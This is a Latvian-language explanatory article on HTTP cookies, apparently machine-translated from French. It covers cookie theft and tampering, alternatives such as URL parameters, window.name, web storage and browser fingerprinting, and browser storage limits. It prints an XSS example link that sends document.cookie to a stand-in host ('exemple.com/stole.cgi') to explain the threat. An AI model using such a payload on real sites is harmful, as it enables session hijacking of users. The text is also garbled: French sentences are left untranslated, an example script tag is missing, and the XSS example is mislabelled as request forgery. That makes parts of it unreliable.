Vēl viens izmantotais drošības apdraudējums ir pieprasījuma izgatavošana vietnē.

Oficiālā tehniskā specifikācija ļauj sīkfailus nosūtīt atpakaļ tikai uz serveriem tajā domēnā, no kura tie radušies. Tomēr sīkfailu vērtību var nosūtīt citiem serveriem, izmantojot citus līdzekļus, nevis sīkfailu galvenes.

Jo īpaši skriptu valodām, piemēram, JavaScript, parasti ir atļauts piekļūt sīkfailu vērtībām un tās var nosūtīt patvaļīgas vērtības uz jebkuru serveri internetā. Šī skriptēšanas iespēja tiek izmantota vietnēs, kas ļauj lietotājiem publicēt HTML saturu, lai citi lietotāji to varētu skatīt.

Piemēram, uzbrucējs, kas darbojas domēnā example.com, var publicēt komentāru, kurā ir šāda saite, kas norāda uz populāru emuāru, kuru viņš citādi nekontrolē:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Kad cits lietotājs noklikšķina uz šīs saites, pārlūkprogramma izpilda koda atribūta onclick daļu, tādējādi aizstājot virkni document.cookie ar šajā lapā aktīvo lietotāja sīkfailu sarakstu. Tādēļ šis sīkfailu saraksts tiek nosūtīts uz example.com serveri, un tādējādi uzbrucējs var savākt šī lietotāja sīkfailus.

Šāda veida uzbrukumu lietotājam ir grūti noteikt, jo skripts nāk no tā paša domēna, kurā tika iestatīts sīkfails, un šķiet, ka vērtību nosūtīšanas darbība ir atļauta šajā domēnā. Tiek uzskatīts, ka šāda veida vietņu pārvaldītāju pienākums ir ieviest ierobežojumus, kas neļauj publicēt ļaunprātīgu kodu.

Sīkfaili nav tieši redzami klienta puses programmām, piemēram, JavaScript, ja tie tika nosūtīti ar karodziņu HttpOnly. No servera viedokļa vienīgā atšķirība ir tā, ka Set-Cookie galvenes rindā ir pievienots jauns lauks, kurā ir virkne HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Kad pārlūkprogramma saņem šādu sīkfailu, ir paredzēts, ka tas parasti jāizmanto nākamajā HTTP apmaiņā, bet nepadarot to redzamu klienta pusē izpildītajiem skriptiem. Karogs HttpOnly neietilpst nevienā oficiālajā tehniskajā specifikācijā un nav ieviests visās pārlūkprogrammās. Ņemiet vērā, ka pašlaik nav iespējams novērst sesijas sīkfailu lasīšanu un rakstīšanu, izmantojot XMLHTTPRequest metodi.

Satura modifikācija: uzbrucējs nosūta serverim nederīgu sīkfailu, kas, iespējams, ir izveidots no derīga servera nosūtīta sīkfaila.

Sīkdatņu maiņa

Tiklīdz sīkfaili ir jāsaglabā un nemainīti jāatdod serverim, uzbrucējs var mainīt sīkfailu vērtību, pirms tie tiek nosūtīti atpakaļ uz serveri. Piemēram, ja sīkfailā ir ietverta kopējā vērtība, kas lietotājam jāmaksā par veikala iepirkumu grozā ievietotajām precēm, šīs vērtības maiņa pakļauj serverim risku, ka no uzbrucēja tiks iekasēta mazāka maksa par sākuma cenu. Tiek saukts sīkfailu vērtības mainīšanas process saindēšanās ar cepumiem un to var izmantot pēc sīkfailu zādzības, lai uzbrukums būtu noturīgs.

Izmantojot sīkfailu ignorēšanas metodi, uzbrucējs izmanto pārlūkprogrammas kļūmi, lai nosūtītu serverim nederīgu sīkfailu.

Tomēr lielākajā daļā vietņu pašā sīkfailā tiek saglabāts tikai sesijas ID — nejauši ģenerēts unikāls numurs, ko izmanto sesijas lietotāja identificēšanai, bet visa pārējā informācija tiek glabāta serverī. Šajā gadījumā šī problēma lielā mērā ir atrisināta.

Sīkdatņu apstrāde starp vietnēm

Paredzams, ka katrai vietnei būs savi sīkfaili, tāpēc vienai vietnei nevajadzētu būt iespējai modificēt vai izveidot ar citu vietni saistītus sīkfailus. Tīmekļa pārlūkprogrammas drošības trūkums var ļaut ļaunprātīgām vietnēm pārkāpt šo noteikumu. Šādas nepilnības izmantošanu parasti sauc par gatavošana starp vietām. Šādu uzbrukumu mērķis var būt sesijas ID zādzība.

Lietotājiem ir jāizmanto jaunākās tīmekļa pārlūkprogrammu versijas, kurās šīs ievainojamības ir praktiski novērstas.

Konfliktējošais stāvoklis starp klientu un serveri

Sīkdatņu izmantošana var radīt pretrunu starp klienta stāvokli un sīkdatnē saglabāto stāvokli. Ja lietotājs iegūst sīkfailu un noklikšķina uz pārlūkprogrammas pogas "Atpakaļ", pārlūkprogrammas stāvoklis parasti nav tāds pats kā pirms šīs iegūšanas. Piemēram, ja interneta veikala grozs ir izveidots, izmantojot sīkdatnes, groza saturs nevar mainīties, lietotājam atgriežoties pārlūkprogrammas vēsturē: ja lietotājs nospiež pogu, lai grozā pievienotu rakstu, un noklikšķina uz "Atgriezties". " pogu, raksts paliek šajā. Tas var nebūt lietotāja nolūks, kurš noteikti vēlas atcelt raksta pievienošanu. Tas var izraisīt neuzticamību, apjukumu un kļūdas. Tāpēc tīmekļa izstrādātājiem ir jāapzinās šī problēma un jāīsteno pasākumi, lai risinātu šādas situācijas.

Sīkdatņu derīguma termiņš

Privātuma drošības eksperti ir kritizējuši pastāvīgās sīkdatnes, jo tām nav iestatīts pietiekami drīzs derīguma termiņš, tādējādi ļaujot vietnēm izsekot lietotājus un laika gaitā izveidot viņu profilu. Šis sīkfailu aspekts ir arī daļa no sesijas nolaupīšanas problēmas, jo nozagtu pastāvīgo sīkfailu var izmantot, lai uzdotos par lietotāju ievērojamu laika periodu.

Lasīt arī: GAFAM: kas viņi ir? Kāpēc viņi (dažreiz) ir tik biedējoši?

Alternatīvas sīkdatnēm

Dažas darbības, ko var veikt, izmantojot sīkfailus, var veikt arī, izmantojot citus mehānismus, kas apiet sīkfailus vai atkārtoti izveido dzēstos sīkfailus, kas rada privātuma problēmas tādā pašā veidā (vai dažreiz sliktāk, jo tad tās ir neredzamas) nekā sīkfaili.

IP adrese

Lietotājus var izsekot ar tā datora IP adresi, kas izsauc lapu. Šis paņēmiens ir bijis pieejams kopš globālā tīmekļa ieviešanas, jo, lejupielādējot lapas, serveris pieprasa tā datora IP adresi, kurā darbojas pārlūkprogramma vai starpniekserveris, ja tāda netiek izmantota. Serveris var izsekot šai informācijai neatkarīgi no tā, vai tiek izmantoti sīkfaili. Tomēr šīs adreses lietotāja identificēšanā parasti ir mazāk uzticamas nekā sīkfaili, jo datorus un starpniekserverus var koplietot vairāki lietotāji, un viens un tas pats dators var saņemt atšķirīgu IP adresi katrā darba sesijā (piemēram, c bieži tālruņa savienojumiem). .

Izsekošana pēc IP adresēm var būt uzticama dažās situācijās, piemēram, platjoslas savienojumiem, kas ilgstoši uztur vienu un to pašu IP adresi, kamēr ir ieslēgta barošana.

Dažas sistēmas, piemēram, Tor, ir izstrādātas, lai saglabātu interneta anonimitāti un padarītu izsekošanu pēc IP adreses neiespējamu vai nepraktisku.

URL

Precīzāka tehnika ir balstīta uz informācijas iegulšanu vietrāžos URL. URL vaicājuma virknes daļa ir viens no paņēmieniem, ko parasti izmanto šim nolūkam, taču var izmantot arī citas daļas. Gan Java serverlet, gan PHP sesijas mehānismi izmanto šo metodi, ja sīkfaili nav iespējoti.

Šī metode ietver tīmekļa servera virkņu pieprasījumu pievienošanu tās tīmekļa lapas saitēm, kurā tā tiek nosūtīta pārlūkprogrammai. Kad lietotājs seko saitei, pārlūkprogramma atgriež serverim pievienoto vaicājuma virkni.

Šim nolūkam izmantotās vaicājumu virknes un sīkfaili ir ļoti līdzīgi, jo abas ir servera patvaļīgi izvēlēta un pārlūkprogrammas atgriezta informācija. Tomēr pastāv dažas atšķirības: ja URL, kas satur vaicājuma virkni, tiek izmantots atkārtoti, tā pati informācija tiek nosūtīta uz serveri. Piemēram, ja lietotāja preferences ir kodētas URL vaicājuma virknē un lietotājs nosūta šo URL citam lietotājam pa e-pastu, šis lietotājs arī varēs izmantot šīs preferences.

No otras puses, ja lietotājs divreiz piekļūst vienai lapai, nav garantijas, ka abas reizes tiks izmantota viena un tā pati vaicājuma virkne. Piemēram, ja lietotājs pirmo reizi nonāk lapā no vietnes iekšējās lapas un otro reizi nokļūst tajā pašā lapā no ārējās lapas, vaicājuma virkne attiecībā pret vietnes lapu parasti atšķiras, bet sīkfaili ir vienādi. .

Citi vaicājumu virkņu trūkumi ir saistīti ar drošību: sesiju identificējošo datu saglabāšana vaicājumu virknēs ļauj vai vienkāršo sesijas fiksācijas uzbrukumus, identifikatora atsauces uzbrukumus un citus ļaunprātīgus pasākumus. Sesijas ID nodošana HTTP sīkfailu veidā ir drošāka.

Slēptās formas lauks

Viens no sesiju izsekošanas veidiem, ko izmanto ASP.NET, ir izmantot tīmekļa veidlapas ar slēptiem laukiem. Šis paņēmiens ir ļoti līdzīgs URL vaicājuma virkņu izmantošanai informācijas pārnešanai, un tai ir tādas pašas priekšrocības un trūkumi; un, ja veidlapa tiek apstrādāta ar HTTP GET metodi, lauki faktiski kļūst par daļu no pārlūkprogrammas URL, kas to nosūtīs, iesniedzot veidlapu. Taču lielākā daļa veidlapu tiek apstrādātas, izmantojot HTTP POST, kā rezultātā veidlapas informācija, tostarp slēptie lauki, tiek pievienota kā papildu ievade, kas nav ne URL daļa, ne sīkfails.

Šai pieejai ir divas priekšrocības no izsekošanas viedokļa: pirmkārt, HTML avota kodā ievietotās informācijas izsekošana un POST ievade, nevis URL, ļaus vidusmēra lietotājam izvairīties no šīs izsekošanas; otrkārt, sesijas informācija netiek kopēta, kad lietotājs kopē URL (piemēram, lai saglabātu lapu diskā vai nosūtītu to pa e-pastu).

logs.nosaukums

Visas izplatītākās tīmekļa pārlūkprogrammas var saglabāt diezgan lielu datu apjomu (2 MB līdz 32 MB), izmantojot JavaScript, izmantojot DOM rekvizītu window.name. Šos datus var izmantot sesijas sīkfailu vietā, un tie tiek izmantoti arī dažādos domēnos. Šo paņēmienu var savienot ar JSON objektiem, lai saglabātu sarežģītu klienta puses sesijas mainīgo kopu.

Negatīvā puse ir tāda, ka katram atsevišķam logam vai cilnei sākotnēji būs tukšs logs.name; pārlūkojot pēc cilnēm (atvērtas lietotājs), tas nozīmē, ka atsevišķi atvērtajām cilnēm nebūs loga nosaukuma. Turklāt logu.name var izmantot, lai izsekotu apmeklētājus dažādās vietnēs, kas var radīt privātuma problēmas.

Dažos aspektos tas var būt drošāks par sīkfailiem, jo ​​serveris nav iesaistīts, tādējādi padarot to neaizsargātu pret sniffer sīkfailu tīkla uzbrukumu. Tomēr, ja tiek veikti īpaši pasākumi datu aizsardzībai, tie ir neaizsargāti pret turpmākiem uzbrukumiem, jo ​​dati ir pieejami caur citām vietnēm, kas atvērtas tajā pašā logā.

HTTP autentifikācija

HTTP protokols ietver pamata piekļuves autentifikācijas protokolus un piekļuves autentifikācijas īssavilkumu, kas ļauj piekļūt tīmekļa lapai tikai tad, kad lietotājs ir norādījis lietotājvārdu un paroli. Ja serveris pieprasa sertifikātu, lai piešķirtu piekļuvi tīmekļa lapai, pārlūkprogramma to pieprasa lietotājam, un pēc iegūšanas pārlūkprogramma to saglabā un nosūta visos turpmākajos HTTP pieprasījumos. Šo informāciju var izmantot, lai izsekotu lietotāju.

Vietējais koplietotais objekts

Ja pārlūkprogrammā ir iekļauts Adobe Flash Player spraudnis, vietējie koplietotie objekti var izmantot tādiem pašiem mērķiem kā sīkfailus. Tie var būt pievilcīga izvēle tīmekļa izstrādātājiem, jo:

• noklusējuma lieluma ierobežojums lokālajam koplietotajam objektam ir 100 KB;
• drošības pārbaudes ir atsevišķas no lietotāja sīkfailu pārbaudēm (tāpēc var atļaut vietējos koplietotos objektus, ja sīkfaili nav).

Šis pēdējais punkts, kas atšķir sīkfailu pārvaldības politiku no Adobe vietējo koplietoto objektu politikas rada jautājumus attiecībā uz lietotāja veikto viņa privātuma iestatījumu pārvaldību: viņam ir jāapzinās, ka viņa sīkfailu pārvaldība neietekmē vietējo koplietoto objektu pārvaldību un otrādi.

Vēl viena šīs sistēmas kritika ir tāda, ka to var izmantot tikai ar Adobe Flash Player spraudni, kas ir patentēts, nevis tīmekļa standarts.

Klienta puses neatlaidība

Dažas tīmekļa pārlūkprogrammas atbalsta uz skriptiem balstītu noturības mehānismu, kas ļauj lapai lokāli saglabāt informāciju vēlākai lietošanai. Piemēram, pārlūkprogramma Internet Explorer atbalsta noturīgu informāciju pārlūkprogrammas vēsturē, grāmatzīmēs, XML formātā vai tieši diskā saglabātā tīmekļa lapā. Programmai Microsoft Internet Explorer 5 ir pieejama lietotāja datu metode, izmantojot DHTML darbības.

W3C HTML 5 ieviesa jaunu JavaScript API klienta puses datu glabāšanai, ko sauc par tīmekļa krātuvi, un tās mērķis bija neatgriezeniski aizstāt sīkfailus. Tas ir līdzīgs sīkfailiem, taču ar ievērojami uzlabotu ietilpību un bez informācijas glabāšanas HTTP pieprasījumu galvenē. API pieļauj divu veidu tīmekļa krātuvi: lokālo krātuvi un sesiju krātuvi, līdzīgi pastāvīgajiem sīkfailiem un sesijas sīkfailiem (izņemot to, ka sesijas sīkfailu derīguma termiņš beidzas, kad pārlūkprogramma tiek aizvērta sesiju krātuve beigsies, kad cilne ir aizvērta), attiecīgi. Tīmekļa krātuvi atbalsta Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 un Opera 10.50.

Cits mehānisms parasti balstās uz pārlūkprogrammas kešatmiņu (atmiņā, nevis atsvaidzināšanu), izmantojot JavaScript programmas tīmekļa lapās. 

Piemēram, lapā var būt tags . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Šajā brīdī programma paliek kešatmiņā un apmeklētā lapa netiek atkārtoti ielādēta otrreiz. Līdz ar to, ja programmā ir ietverts globāls mainīgais (piemēram, var id = 3243242;), šis identifikators paliek derīgs un to var izmantot cits JavaScript kods, tiklīdz lapa tiek atkārtoti ielādēta vai tiek ielādēta lapa, kas saista programmu. 

Šīs metodes galvenais trūkums ir tāds, ka JavaScript globālajam mainīgajam ir jābūt statiskam, kas nozīmē, ka to nevar mainīt vai dzēst kā sīkfailu.

tīmekļa pārlūkprogrammas pirkstu nospiedums

Pārlūkprogrammas pirkstu nospiedums ir informācija, kas savākta par pārlūkprogrammas konfigurācijas iestatījumiem identifikācijas nolūkos. Šos pirkstu nospiedumus var izmantot, lai pilnībā vai daļēji identificētu interneta lietotāju vai ierīci, pat ja sīkfaili ir atspējoti.

Vietņu auditorijas pakalpojumi jau sen ir apkopojuši tīmekļa pārlūkprogrammas konfigurācijas pamatinformāciju, lai precīzi izmērītu cilvēku tīmekļa trafiku un atklātu dažādus klikšķu krāpšanas veidus. Izmantojot klienta puses skriptu valodas, informācijas vākšana ir daudz precīzāka tagad iespējams.

Pārvēršot šo informāciju bitu virknē, tiek izveidots ierīces pirksta nospiedums. 2010. gadā Electronic Frontier Foundation (EFF) noteica, ka pārlūkprogrammas pirkstu nospieduma entropija ir vismaz 18,1 biti, un tas bija pirms audekla pirkstu nospiedumu noņemšanas šai entropijai pievienoja 5,7 bitus.

Cepumi īsumā

Sīkfaili ir mazi teksta faili, ko tīmekļa pārlūkprogramma saglabā vietnes apmeklētāja cietajā diskā un kas tiek izmantoti (cita starpā), lai ierakstītu informāciju par apmeklētāju vai viņa ceļojumu vietnē. Tādējādi tīmekļa pārzinis var atpazīt apmeklētāja paradumus un personalizēt savas vietnes prezentāciju katram apmeklētājam; pēc tam sīkfaili ļauj atcerēties, cik rakstu parādīt mājaslapā vai pat saglabāt pieteikšanās akreditācijas datus jebkurai privātai pusei: kad apmeklētājs atgriežas vietnē, viņam vairs nav jāievada savs vārds un parole. tiek atpazīti, jo tie tiek automātiski nolasīti sīkfailā.

Sīkfailam ir ierobežots kalpošanas laiks, ko nosaka vietnes dizainers. Tie var beigties arī vietnes sesijas beigās, kas atbilst pārlūkprogrammas aizvēršanai. Sīkdatnes tiek plaši izmantotas, lai atvieglotu apmeklētāju dzīvi un sniegtu viņiem atbilstošāku informāciju. Taču īpašas metodes ļauj sekot apmeklētājam vairākās vietnēs un tādējādi savākt un pārbaudīt ļoti plašu informāciju par viņa paradumiem. Šī metode ir devusi sīkdatņu izmantošanai reputāciju kā novērošanas tehnikai, kas pārkāpj apmeklētāju privātumu, kas diemžēl atbilst realitātei daudzos gadījumos, kad tiek izmantotas netehnisku iemeslu dēļ vai nerespektējot lietotāju vēlmes.

Reaģējot uz šīm pamatotajām bažām, HTML 5 ievieš jaunu JavaScript API klienta puses datu glabāšanai, ko sauc par tīmekļa krātuvi, kas ir daudz drošāka un ar lielāku ietilpību, kuras mērķis ir aizstāt sīkfailus.

Sīkdatņu uzglabāšana

Dažās pārlūkprogrammās sīkfails ir viegli rediģējams, lai manuāli mainītu tā vērtības, pietiek ar vienkāršu teksta redaktoru, piemēram, Notepad.

Sīkfaili tiek saglabāti atšķirīgi atkarībā no pārlūkprogrammas:

• Microsoft Internet Explorer katru sīkfailu saglabā citā failā;
• Mozilla Firefox saglabā visus savus sīkfailus vienā failā;
• Opera saglabā visus savus sīkfailus vienā failā un šifrē (tos nav iespējams modificēt, izņemot programmatūras opcijās);
• Apple Safari saglabā visus savus sīkfailus vienā .plist paplašinājuma failā. Modifikācija ir iespējama, taču ne pārāk vienkārša, ja vien neizejat programmatūras opcijas.

Lai atbalstītu, ir nepieciešamas pārlūkprogrammas minimums :

• 300 vienlaicīgi cepumi;
• 4 o par sīkfailu;
• 20 sīkfaili uz vienu saimniekdatoru vai domēnu.